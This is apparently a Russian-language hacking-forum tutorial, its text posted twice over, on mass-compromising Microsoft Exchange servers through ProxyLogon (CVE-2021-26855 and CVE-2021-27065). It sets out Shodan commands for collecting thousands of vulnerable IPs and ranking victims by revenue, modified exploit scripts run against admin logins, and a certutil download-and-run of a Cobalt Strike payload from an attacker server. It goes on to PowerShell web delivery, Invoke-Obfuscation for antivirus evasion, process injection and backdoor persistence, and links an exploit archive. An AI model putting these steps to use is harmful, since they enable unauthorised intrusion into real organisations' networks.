Всем доброго времени суток, нашлось свободное время для написания статьи, строго не судить)). конкретно: что такое ProxyLogon, какой вид уязвимости, а так же как происходило проникновение в сеть, строго не судить, у меня были свои методы проникновения, ------> Поехали!!!
ProxyLogon - это формально общее название CVE-2021-26855 , уязвимости на сервере Microsoft Exchange Server, которая позволяет злоумышленнику обойти аутентификацию и выдать себя за администратора. Мы также связали эту ошибку с другой уязвимостью произвольного файла CVE-2021-27065 после авторизации связанной с записью , , чтобы получить выполнение кода. Все затронутые компоненты по умолчанию уязвимы !
В результате , не прошедший проверку подлинности, злоумышленник может выполнять произвольные команды на сервере Microsoft Exchange Server через только открытый порт 443 !
Что нам потребуется?
1) Это сам ProxyLogon, по мне самая хорошая реализация данного CVE от автора Udyz https://github.com/Udyz "Ниже будет выложен доработтаный скрипт"
2) Cobalt Strike
3) Invoke-Obfuscation для Powershell
4) IEX & CERTUTIL.EXE
Оговорюсь сразу работы будет много, данная статья расписана для трудолюбивых так сказать!!!
Атака будет происходить из 3 частей
1) Сбор Материала, Разведка
2) Проникновение в сеть
3) Крепление в сети
Начнем со сбора Материала, мною был выложен "Мануал по Шодан" вот он нам и поможет собрать сразу быстро и много материала, для тестов и проникновения в сеть.
Ссылка на мой пост Мануал по Использованию Shodan.
Приведу сюда пример с моего поста.
Вставляем выложенный мною ключ, пишем ---->> shodan download exchange.json.gz vuln:cve-2021-26855 выдаст плюс минус 10к уязвимых айпи адрессов..
Все на данный момент я вам подсказал где искать сразу и много мата плюс в том что, сразу уязвимый..
После как shodan выкачает все пишем команду ---- >>>> gzip -d exchange.json.gz
После парсим Айпи адреса из файла json ---- >>>> shodan parse exchange.json.gz --fields=ip_str > vuln.txt
На этом сбор материала завершен далее идет разведка материала что он из себя представляет, какое айпи куда относится и т.п
Берем парсер, данный парсер я выложу ниже вместе с другими скриптами.
переименовываем exchange.txt в iplist.txt ждем, данный сканнер покажет какое айпи относится к какому домену есть один подвох некоторые айпи адреса прячутся за провайдерами.
После как парсер спарсит айпи адреса сохранится файлик output.txt где на против каждых айпи будут домены тут уже по пробиву можно взять софт выложенный Борисом, дело каждого.
Хорошо на этом заканчивается разведка Материала какой айпи к чему относится а так же Ревеню.
Шаг второй, сканирования уязвимых айпи на SSRF.
из скрипта было вырезано Авторизация по списку login, и оставленные мною всего 2 логина это administrator & admin, с spn 500, почему я вырезал все остальное и оставил только 2 айпишки, да потому что логины кроме этих двух, не могут авторизоватся и сканирование на пусть будет 20-30 100 штук, это лишняя трата времени.
запускаем скрипт proxy.py -->> идем пить чай, кофе, пиво..
спустя время 10к айпи прочеканы и лежат в output.txt можем сделать так, после как proxy.py закончил свою работу, закидываем айпишки в pars.py и ждем результат какие домены выдал, попадаются разные ревнью, от 300к до 5ккк.
Берем скрипт уже Автора AutoProxyLogon.py оставляем в текстовике только 2 логина administrator & admin, меняем в скрипте автора с cmd /c на powershell /c и строкой ниже так же..
и Вуаля имеем доступ к Машинке и уже с открытым powershell -- пробуем первый вариант, у меня на тот момент 3 vps, на первом Cobalt Strike на 2 teamserver, на 3 не скажу секрет!
Есть 2 варианта генерации а так же доставки, первое поднятие нагрузки в Cobalt, второе генерация payload exe с загрузкой на тот же AnonFiles, и доставка на машинку, CERTUTIL.EXE, иногда бывает в#ебывается на подленность сертификата сайта, 2/3 вариант создания Payload Generator Script(S) web доставка то есть. --->>> Разобрались как будем делать доставку.
Все сгенерировали payload подняли на серваке черезе web доставку, идем в терминал жертвы а то есть в свой, пишем certutil.exe -urlcache -split -f http://{ip}{или domain}/shell.exe shell.exe, я все делал через ngrok что бы понять была ли доставка на компьютер жертвы или нет, 200 ok.
Запуск exeшника производится коммандой -->> start payload.exe может создать батник echo, кому как удобно.
Вуаля мы на машинке жертвы, у нас сессия в кобе)))) 40% сделано, 60% это разведка AD -- поднятие прав -- но это уже совсем другая история, и если я ее тут начну описывать то это займет статей 20 усталых рук!
первый метод payload generator, второй метод Script By Web Delivery --> Powershell IEX, просто вставляем ссылку в терминал и все сессия в кобе, делаем пару прыжков на разные процессы, и закрепление на этом заканчивается, можете еще добавить в автозагрузку backdoor и т.д! дело каждого!
Посмотреть вложение 23816
Забыли про Invoke-Obfuscation, бывают такие моменты что ав блокает запуск вашего exe и удаляет сразу, качает Invoke-Obfuscation с github
Посмотреть вложение 23817
Генерируем в кобе полезную нагрузку powershell ---> заходим в папку Invoke-Obfuscation --> ps.exe > Import-Module .\Invoke-Obfuscation.psd1 --->> Invoke-Obfuscation далее комманды для обфускации
Посмотреть вложение 23821
Посмотреть вложение 23820
set ScriptPath dir{payload.ps1} -> задаем путь до полезной нагрузки
sting - token ---> метод обфускации
all - все
1
clip - копировать
открываем тот же payload.ps1 вычищаем все ctrl - A + ctrl + V save
кидаем для проверки на антискан, из миллион детектов 1 - 2 детект, а в некоторых моментах фуд такой метод нам вполне хватит для получения сессии в Cobalt.. так же инжектив в пару процессов крепимся!!!
Посмотреть вложение 23817Посмотреть вложение 23816
https://anonfiles.com/p2x0s522u5/ProxyLogon_zip || xss.pro || ссылка на архив со скриптом от автора и, доработанным.
Прошу прощения за ошибки! Дальше Интереснее))
Всем спасибо за внимание, Пишите в данной статье в случае если что-то не будет получатся, помогу объясню расскажу!
Что такое ProxyLogon?
ProxyLogon - это формально общее название CVE-2021-26855 , уязвимости на сервере Microsoft Exchange Server, которая позволяет злоумышленнику обойти аутентификацию и выдать себя за администратора. Мы также связали эту ошибку с другой уязвимостью произвольного файла CVE-2021-27065 после авторизации связанной с записью , , чтобы получить выполнение кода. Все затронутые компоненты по умолчанию уязвимы !
В результате , не прошедший проверку подлинности, злоумышленник может выполнять произвольные команды на сервере Microsoft Exchange Server через только открытый порт 443 !
Что нам потребуется?
1) Это сам ProxyLogon, по мне самая хорошая реализация данного CVE от автора Udyz https://github.com/Udyz "Ниже будет выложен доработтаный скрипт"
2) Cobalt Strike
3) Invoke-Obfuscation для Powershell
4) IEX & CERTUTIL.EXE
Оговорюсь сразу работы будет много, данная статья расписана для трудолюбивых так сказать!!!
Атака будет происходить из 3 частей
1) Сбор Материала, Разведка
2) Проникновение в сеть
3) Крепление в сети
Начнем со сбора Материала, мною был выложен "Мануал по Шодан" вот он нам и поможет собрать сразу быстро и много материала, для тестов и проникновения в сеть.
Ссылка на мой пост Мануал по Использованию Shodan.
Приведу сюда пример с моего поста.
Вставляем выложенный мною ключ, пишем ---->> shodan download exchange.json.gz vuln:cve-2021-26855 выдаст плюс минус 10к уязвимых айпи адрессов..
Все на данный момент я вам подсказал где искать сразу и много мата плюс в том что, сразу уязвимый..
После как shodan выкачает все пишем команду ---- >>>> gzip -d exchange.json.gz
После парсим Айпи адреса из файла json ---- >>>> shodan parse exchange.json.gz --fields=ip_str > vuln.txt
На этом сбор материала завершен далее идет разведка материала что он из себя представляет, какое айпи куда относится и т.п
Берем парсер, данный парсер я выложу ниже вместе с другими скриптами.
переименовываем exchange.txt в iplist.txt ждем, данный сканнер покажет какое айпи относится к какому домену есть один подвох некоторые айпи адреса прячутся за провайдерами.
После как парсер спарсит айпи адреса сохранится файлик output.txt где на против каждых айпи будут домены тут уже по пробиву можно взять софт выложенный Борисом, дело каждого.
Хорошо на этом заканчивается разведка Материала какой айпи к чему относится а так же Ревеню.
Шаг второй, сканирования уязвимых айпи на SSRF.
из скрипта было вырезано Авторизация по списку login, и оставленные мною всего 2 логина это administrator & admin, с spn 500, почему я вырезал все остальное и оставил только 2 айпишки, да потому что логины кроме этих двух, не могут авторизоватся и сканирование на пусть будет 20-30 100 штук, это лишняя трата времени.
запускаем скрипт proxy.py -->> идем пить чай, кофе, пиво..
спустя время 10к айпи прочеканы и лежат в output.txt можем сделать так, после как proxy.py закончил свою работу, закидываем айпишки в pars.py и ждем результат какие домены выдал, попадаются разные ревнью, от 300к до 5ккк.
Берем скрипт уже Автора AutoProxyLogon.py оставляем в текстовике только 2 логина administrator & admin, меняем в скрипте автора с cmd /c на powershell /c и строкой ниже так же..
и Вуаля имеем доступ к Машинке и уже с открытым powershell -- пробуем первый вариант, у меня на тот момент 3 vps, на первом Cobalt Strike на 2 teamserver, на 3 не скажу секрет!
Есть 2 варианта генерации а так же доставки, первое поднятие нагрузки в Cobalt, второе генерация payload exe с загрузкой на тот же AnonFiles, и доставка на машинку, CERTUTIL.EXE, иногда бывает в#ебывается на подленность сертификата сайта, 2/3 вариант создания Payload Generator Script(S) web доставка то есть. --->>> Разобрались как будем делать доставку.
Все сгенерировали payload подняли на серваке черезе web доставку, идем в терминал жертвы а то есть в свой, пишем certutil.exe -urlcache -split -f http://{ip}{или domain}/shell.exe shell.exe, я все делал через ngrok что бы понять была ли доставка на компьютер жертвы или нет, 200 ok.
Запуск exeшника производится коммандой -->> start payload.exe может создать батник echo, кому как удобно.
Вуаля мы на машинке жертвы, у нас сессия в кобе)))) 40% сделано, 60% это разведка AD -- поднятие прав -- но это уже совсем другая история, и если я ее тут начну описывать то это займет статей 20 усталых рук!
первый метод payload generator, второй метод Script By Web Delivery --> Powershell IEX, просто вставляем ссылку в терминал и все сессия в кобе, делаем пару прыжков на разные процессы, и закрепление на этом заканчивается, можете еще добавить в автозагрузку backdoor и т.д! дело каждого!
Посмотреть вложение 23816
Забыли про Invoke-Obfuscation, бывают такие моменты что ав блокает запуск вашего exe и удаляет сразу, качает Invoke-Obfuscation с github
GitHub - danielbohannon/Invoke-Obfuscation: PowerShell Obfuscator
PowerShell Obfuscator. Contribute to danielbohannon/Invoke-Obfuscation development by creating an account on GitHub.
github.com
Посмотреть вложение 23817
Генерируем в кобе полезную нагрузку powershell ---> заходим в папку Invoke-Obfuscation --> ps.exe > Import-Module .\Invoke-Obfuscation.psd1 --->> Invoke-Obfuscation далее комманды для обфускации
Посмотреть вложение 23821
Посмотреть вложение 23820
set ScriptPath dir{payload.ps1} -> задаем путь до полезной нагрузки
sting - token ---> метод обфускации
all - все
1
clip - копировать
открываем тот же payload.ps1 вычищаем все ctrl - A + ctrl + V save
кидаем для проверки на антискан, из миллион детектов 1 - 2 детект, а в некоторых моментах фуд такой метод нам вполне хватит для получения сессии в Cobalt.. так же инжектив в пару процессов крепимся!!!
Посмотреть вложение 23817Посмотреть вложение 23816
https://anonfiles.com/p2x0s522u5/ProxyLogon_zip || xss.pro || ссылка на архив со скриптом от автора и, доработанным.
Прошу прощения за ошибки! Дальше Интереснее))
Всем спасибо за внимание, Пишите в данной статье в случае если что-то не будет получатся, помогу объясню расскажу!
Последнее редактирование:
